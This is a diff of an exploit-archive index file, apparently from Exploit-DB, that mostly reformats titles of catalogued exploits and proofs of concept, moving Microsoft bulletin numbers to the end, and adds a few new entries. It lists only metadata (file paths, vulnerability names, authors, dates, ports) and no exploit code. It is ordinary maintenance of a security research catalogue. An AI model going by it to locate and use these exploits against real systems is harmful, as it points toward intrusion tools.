@ -16189,7 +16188,7 @@ id,file,description,date,author,platform,type,port
18752,platforms/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0
18753,platforms/php/webapps/18753.txt,"XOOPS 2.5.4 - Multiple XSS Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0
18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 Memory Corruption",2012-04-19,shinnai,multiple,dos,0
18755,platforms/windows/dos/18755.c,"MS11-046 Afd.sys Proof of Concept",2012-04-19,fb1h2s,windows,dos,0
18755,platforms/windows/dos/18755.c,"Windows - Afd.sys Proof of Concept (MS11-046)",2012-04-19,fb1h2s,windows,dos,0
18756,platforms/multiple/dos/18756.txt,"OpenSSL ASN1 BIO Memory Corruption Vulnerability",2012-04-19,"Tavis Ormandy",multiple,dos,0
18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 (.mp4) - Crash PoC",2012-04-19,"Senator of Pirates",windows,dos,0
18758,platforms/multiple/dos/18758.txt,"Wireshark 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0
@ -16211,7 +16210,7 @@ id,file,description,date,author,platform,type,port
18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter Integer Overflow Vulnerability",2012-04-24,"Akita Software Security",windows,dos,0
18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 (index.php p parameter) SQL Injection",2012-04-24,G13,php,webapps,0
18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices Backdoor Access",2012-04-24,jc,hardware,remote,0
18780,platforms/windows/remote/18780.rb,"MS12-027 MSCOMCTL ActiveX Buffer Overflow",2012-04-25,metasploit,windows,remote,0
18780,platforms/windows/remote/18780.rb,"WIndows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,metasploit,windows,remote,0
18781,platforms/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Buffer Overflow",2012-04-25,metasploit,windows,local,0
18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0
18783,platforms/linux/local/18783.txt,"mount.cifs chdir() Arbitrary root File Identification",2012-04-25,Sha0,linux,local,0
@ -16411,7 +16410,7 @@ id,file,description,date,author,platform,type,port
19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0
19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0
19036,platforms/php/webapps/19036.php,"Wordpress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0
19037,platforms/windows/local/19037.rb,"MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability",2012-06-11,metasploit,windows,local,0
19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling Vulnerability (MS12-005)",2012-06-11,metasploit,windows,local,0
19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",2012-06-10,metasploit,php,webapps,0
19039,platforms/bsd/remote/19039,"BSD 4.2 fingerd buffer overflow Vulnerability",1988-10-01,anonymous,bsd,remote,0
19040,platforms/solaris/remote/19040,"SunView (SunOS <= 4.1.1) selection_svc Vulnerability",1990-08-14,"Peter Shipley",solaris,remote,0
@ -16504,7 +16503,7 @@ id,file,description,date,author,platform,type,port
19137,platforms/hardware/dos/19137.rb,"Wyse Machine Remote Power off (DOS) without any privilege",2012-06-14,it.solunium,hardware,dos,0
19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0
19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0
19141,platforms/windows/remote/19141.rb,"MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption",2012-06-14,metasploit,windows,remote,0
19141,platforms/windows/remote/19141.rb,"Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,metasploit,windows,remote,0
19142,platforms/linux/local/19142.sh,"Oracle 8 File Access Vulnerabilities",1999-05-06,"Kevin Wenchel",linux,local,0
19143,platforms/windows/local/19143.c,"Microsoft Windows ""April Fools 2001"" Vulnerability",1999-01-07,"Richard M. Smith",windows,local,0
19144,platforms/windows/local/19144,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability",1999-01-07,"Satu Laksela",windows,local,0
@ -17099,7 +17098,7 @@ id,file,description,date,author,platform,type,port
19774,platforms/hardware/webapps/19774.txt,"TP Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps,0
19775,platforms/php/webapps/19775.txt,"Reserve Logic 1.2 - Booking CMS Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,php,webapps,0
19776,platforms/windows/local/19776.pl,"ZipItFast PRO 3.0 - Heap Overflow Exploit",2012-07-12,b33f,windows,local,0
19777,platforms/windows/dos/19777.txt,"IE9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0
19777,platforms/windows/dos/19777.txt,"IE 9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0
19778,platforms/linux/local/19778.c,"RedHat 4.x/5.x/6.x,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.x man Buffer Overrun (1)",2000-02-26,"Babcia Padlina",linux,local,0
19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.x man Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0
19780,platforms/multiple/remote/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 DoS Vulnerabilities",2000-02-26,"Jeff Stevens",multiple,remote,0
@ -17834,7 +17833,7 @@ id,file,description,date,author,platform,type,port
20544,platforms/php/webapps/20544.txt,"xt:Commerce <= 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0
20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0
20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0
20547,platforms/windows/remote/20547.txt,"IE Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0
20547,platforms/windows/remote/20547.txt,"Internet Explorer Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0
20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Stored XSS",2012-08-16,"Shai rod",php,webapps,0
20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - CSRF Vulnerability",2012-08-16,DaOne,php,webapps,0
20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) Remote Execution",2012-08-16,iJoo,linux,remote,0
@ -19077,11 +19076,11 @@ id,file,description,date,author,platform,type,port
21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio Arbitrary Upload Remote Code Execution",2012-10-10,metasploit,windows,remote,4322
21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter Buffer Overflow",2012-10-10,metasploit,windows,remote,3217
21839,platforms/windows/remote/21839.rb,"NTR ActiveX Control StopModule() Remote Code Execution",2012-10-10,metasploit,windows,remote,0
21840,platforms/windows/remote/21840.rb,"MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability",2012-10-10,metasploit,windows,remote,0
21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free Vulnerability (MS12-063)",2012-10-10,metasploit,windows,remote,0
21841,platforms/windows/remote/21841.rb,"NTR ActiveX Control Check() Method Buffer Overflow",2012-10-10,metasploit,windows,remote,0
21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",2012-10-10,metasploit,windows,remote,0
21843,platforms/windows/local/21843.rb,"Windows Escalate UAC Execute RunAs",2012-10-10,metasploit,windows,local,0
21844,platforms/windows/local/21844.rb,"MS11-080 AfdJoinLeaf Privilege Escalation",2012-10-10,metasploit,windows,local,0
21844,platforms/windows/local/21844.rb,"Windows - AfdJoinLeaf Privilege Escalation (MS11-080)",2012-10-10,metasploit,windows,local,0
21845,platforms/windows/local/21845.rb,"Windows Escalate UAC Protection Bypass",2012-10-10,metasploit,windows,local,0
21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService Remote Code Execution",2012-10-10,metasploit,java,remote,7001
21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution",2012-10-10,metasploit,windows,remote,0
@ -21631,7 +21630,7 @@ id,file,description,date,author,platform,type,port
24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x and 5.0.x Persistent XSS Vulnerability",2013-02-11,"Mohamed Ramadan",php,webapps,0
24483,platforms/hardware/webapps/24483.txt,"TP-LINK Admin Panel Multiple CSRF Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0
24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0
24485,platforms/windows/dos/24485.txt,"MS13-005 HWND_BROADCAST PoC",2013-02-11,0vercl0k,windows,dos,0
24485,platforms/windows/dos/24485.txt,"Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0
24486,platforms/multiple/dos/24486.txt,"Google Chrome Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0
24487,platforms/linux/dos/24487.py,"cURL Buffer Overflow Vulnerability",2013-02-11,Volema,linux,dos,0
24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",2013-02-12,metasploit,windows,remote,0
@ -21673,7 +21672,7 @@ id,file,description,date,author,platform,type,port
24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0
24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple XSS Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0
24537,platforms/php/webapps/24537.txt,"phpMyRecipes 1.2.2 (viewrecipe.php, r_id param) - SQL Injection Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
24538,platforms/windows/remote/24538.rb,"MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",2013-02-23,metasploit,windows,remote,0
24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,metasploit,windows,remote,0
24539,platforms/multiple/remote/24539.rb,"Java Applet JMX Remote Code Execution",2013-02-25,metasploit,multiple,remote,0
24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection Exploit",2013-02-26,"cr4wl3r ",php,webapps,0
24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection Vulnerability",2013-02-26,L0n3ly-H34rT,php,webapps,0
@ -23256,7 +23255,7 @@ id,file,description,date,author,platform,type,port
26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0
26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos,0
26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez, Lopez, Castillo",hardware,webapps,0
26175,platforms/windows/remote/26175.rb,"MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow",2013-06-13,metasploit,windows,remote,0
26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,metasploit,windows,remote,0
26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x ModCP.PHP SQL Injection Vulnerability",2005-08-20,[R],php,webapps,0
26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 links.php w Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0
26178,platforms/php/webapps/26178.txt,"Land Down Under 800/801 journal.php m Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0
@ -25103,7 +25102,7 @@ id,file,description,date,author,platform,type,port
28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0
28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0
28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0
28082,platforms/windows/remote/28082.rb,"MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free",2013-09-04,metasploit,windows,remote,0
28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,metasploit,windows,remote,0
28083,platforms/windows/remote/28083.rb,"HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,metasploit,windows,remote,0
28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0
28085,platforms/windows/local/28085.html,"KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)",2013-09-04,blake,windows,local,0
@ -25205,7 +25204,7 @@ id,file,description,date,author,platform,type,port
28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0
28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 (search.php, cat_id param) - SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0
28186,platforms/windows/remote/28186.c,"Kaillera 0.86 Message Buffer Overflow Vulnerability",2006-07-06,"Luigi Auriemma",windows,remote,0
28187,platforms/windows/remote/28187.rb,"MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free",2013-09-10,metasploit,windows,remote,0
28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer CAnchorElement Use-After-Free (MS13-055)",2013-09-10,metasploit,windows,remote,0
28188,platforms/windows/remote/28188.rb,"HP SiteScope Remote Code Execution",2013-09-10,metasploit,windows,remote,8080
28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution Vulnerability",2006-07-06,Nanika,windows,remote,0
28190,platforms/php/webapps/28190.txt,"ExtCalendar 2.0 ExtCalendar.php Remote File Include Vulnerability",2006-07-07,Matdhule,php,webapps,0
@ -25256,7 +25255,7 @@ id,file,description,date,author,platform,type,port
28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x LHA Filename Handling Buffer Overflow Vulnerability",2006-07-18,"Ryan Smith",windows,remote,0
28236,platforms/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps,0
28237,platforms/windows/dos/28237.py,"Target Longlife Media Player 2.0.2.0 (.wav) - Crash PoC",2013-09-12,gunslinger_,windows,dos,0
28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability MS13-067",2013-09-12,Vulnerability-Lab,windows,webapps,0
28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability (MS13-067)",2013-09-12,Vulnerability-Lab,windows,webapps,0
28239,platforms/hardware/webapps/28239.txt,"D-Link DSL-2740B - Multiple CSRF Vulnerabilities",2013-09-12,"Ivano Binetti",hardware,webapps,0
28243,platforms/linux/webapps/28243.txt,"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities",2013-09-12,"Andrea Fabrizi",linux,webapps,0
28244,platforms/windows/dos/28244.txt,"Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service Vulnerability",2006-07-19,hdm,windows,dos,0
@ -25486,8 +25485,8 @@ id,file,description,date,author,platform,type,port
28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 Aut_Verifica.Inc.PHP SQL Injection Vulnerability",2006-09-02,SirDarckCat,php,webapps,0
28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 Multi-Egghunter",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow",2013-09-23,metasploit,windows,remote,6502
28481,platforms/windows/remote/28481.rb,"MS13-069 Microsoft Internet Explorer CCaret Use-After-Free",2013-09-23,metasploit,windows,remote,0
28482,platforms/windows/remote/28482.rb,"MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",2013-09-23,metasploit,windows,remote,0
28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)",2013-09-23,metasploit,windows,remote,0
28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,metasploit,windows,remote,0
28483,platforms/php/remote/28483.rb,"GLPI install.php Remote Command Execution",2013-09-23,metasploit,php,remote,80
28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 Remote Command Execution",2013-09-23,metasploit,hardware,remote,0
28485,platforms/php/webapps/28485.txt,"Wordpress NOSpamPTI Plugin - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0
@ -25964,7 +25963,7 @@ id,file,description,date,author,platform,type,port
28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 (exportcsv.php, sondage param) - SQL Injection",2013-10-15,drone,php,webapps,80
28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection and Remote Code Execution",2013-10-15,"Jason Kratzer",unix,webapps,0
28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,metasploit,windows,remote,0
28974,platforms/windows/remote/28974.rb,"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",2013-10-15,metasploit,windows,remote,0
28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,metasploit,windows,remote,0
28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0
28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Include Vulnerability",2013-10-15,Vulnerability-Lab,ios,webapps,0
28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0
@ -26783,8 +26782,8 @@ id,file,description,date,author,platform,type,port
29853,platforms/windows/remote/29853.rb,"LanDesk Management Suite 8.7 Alert Service AOLSRVR.EXE Buffer Overflow Vulnerability",2007-04-13,"Aaron Portnoy",windows,remote,0
29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 Img_Popup.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0
29855,platforms/php/webapps/29855.txt,"Flowers Cas.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0
29857,platforms/windows/remote/29857.rb,"MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow",2013-11-27,metasploit,windows,remote,0
29858,platforms/windows/remote/29858.rb,"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access",2013-11-27,metasploit,windows,remote,0
29857,platforms/windows/remote/29857.rb,"Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,metasploit,windows,remote,0
29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)",2013-11-27,metasploit,windows,remote,0
29859,platforms/java/remote/29859.rb,"Apache Roller OGNL Injection",2013-11-27,metasploit,java,remote,8080
29860,platforms/windows/dos/29860.c,"ZoneAlarm 6.1.744.001/6.5.737.000 Vsdatant.SYS Driver Local Denial of Service Vulnerability",2007-04-15,"Matousec Transparent security",windows,dos,0
29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0
@ -29181,7 +29180,7 @@ id,file,description,date,author,platform,type,port
32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerabil?ity (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0
32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
32438,platforms/windows/remote/32438.rb,"MS14-012 Internet Explorer TextRange Use-After-Free",2014-03-22,metasploit,windows,remote,0
32438,platforms/windows/remote/32438.rb,"Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
@ -29523,7 +29522,7 @@ id,file,description,date,author,platform,type,port
32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF Vulnerability",2014-04-10,"High-Tech Bridge SA",php,webapps,80
32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit (1)",2014-04-10,prdelka,multiple,remote,443
32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80
32793,platforms/windows/local/32793.rb,"MS14-017 Microsoft Word RTF Object Confusion",2014-04-10,metasploit,windows,local,0
32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017)",2014-04-10,metasploit,windows,local,0
32794,platforms/php/remote/32794.rb,"Vtiger Install Unauthenticated Remote Command Execution",2014-04-10,metasploit,php,remote,80
32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0
32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet Directory Traversal Vulnerability",2009-02-10,"Terry Froy",linux,remote,0
@ -29579,7 +29578,7 @@ id,file,description,date,author,platform,type,port
32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 Local Privilege Escalation Vulnerability",2009-03-10,"Sun Microsystems",linux,local,0
32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0
32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0
32851,platforms/windows/remote/32851.html,"MS14-012 Internet Explorer CMarkup Use-After-Free",2014-04-14,"Jean-Jamil Khalife",windows,remote,0
32851,platforms/windows/remote/32851.html,"Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-14,"Jean-Jamil Khalife",windows,remote,0
32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 'tiki-galleries.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 'tiki-list_file_gallery.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 'tiki-listpages.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
@ -29630,7 +29629,7 @@ id,file,description,date,author,platform,type,port
32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass Vulnerability",2009-04-10,"Maksymilian Arciemowicz",php,local,0
32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 File Download Denial of Service Vulnerability",2009-04-11,"Nam Nguyen",windows,dos,0
32903,platforms/asp/webapps/32903.txt,"People-Trak Login SQL Injection Vulnerability",2009-04-13,Mormoroth.net,asp,webapps,0
32904,platforms/windows/remote/32904.rb,"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",2014-04-16,metasploit,windows,remote,0
32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-16,metasploit,windows,remote,0
32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 login.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 new_images.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension 'apps/web/vs_diag.cgi' Cross Site Scripting Vulnerability",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0
@ -30499,7 +30498,7 @@ id,file,description,date,author,platform,type,port
33856,platforms/php/webapps/33856.txt,"Viennabux Beta! 'cat' Parameter SQL Injection Vulnerability",2010-04-09,"Easy Laster",php,webapps,0
33857,platforms/php/webapps/33857.txt,"e107 0.7.x 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0
33858,platforms/php/webapps/33858.txt,"DBSite wb CMS 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0
33860,platforms/windows/dos/33860.html,"Internet Explorer 8, 9 & 10 - CInput Use-After-Free (MS14-035) - Crash PoC",2014-06-24,"Drozdova Liudmila",windows,dos,0
33860,platforms/windows/dos/33860.html,"Internet Explorer 8, 9 & 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
33862,platforms/hardware/remote/33862.rb,"D-Link authentication.cgi Buffer Overflow",2014-06-24,metasploit,hardware,remote,80
33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
@ -30528,8 +30527,8 @@ id,file,description,date,author,platform,type,port
33889,platforms/php/webapps/33889.txt,"SmartBlog 1.3 SQL Injection and Cross Site Scripting Vulnerabilities",2010-04-27,indoushka,php,webapps,0
33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 Directory Traversal Vulnerability",2010-04-27,"John Leitch",windows,remote,0
33891,platforms/java/remote/33891.rb,"HP AutoPass License Server File Upload",2014-06-27,metasploit,java,remote,5814
33892,platforms/windows/local/33892.rb,"MS14-009 .NET Deployment Service IE Sandbox Escape",2014-06-27,metasploit,windows,local,0
33893,platforms/windows/local/33893.rb,"MS13-097 Registry Symlink IE Sandbox Escape",2014-06-27,metasploit,windows,local,0
33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,metasploit,windows,local,0
33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,metasploit,windows,local,0
33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
33895,platforms/cgi/webapps/33895.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"BGA Security",cgi,webapps,20001
33896,platforms/php/webapps/33896.txt,"Wordpress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80
@ -30640,3 +30639,11 @@ id,file,description,date,author,platform,type,port
34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 Firmware setup_ddns.exe HTML Injection Vulnerability",2010-05-20,SH4V,hardware,remote,0
34021,platforms/php/webapps/34021.txt,"Joomla! 'com_horses' Component 'id' Parameter SQL Injection Vulnerability",2010-05-19,"Kernel Security Group",php,webapps,0
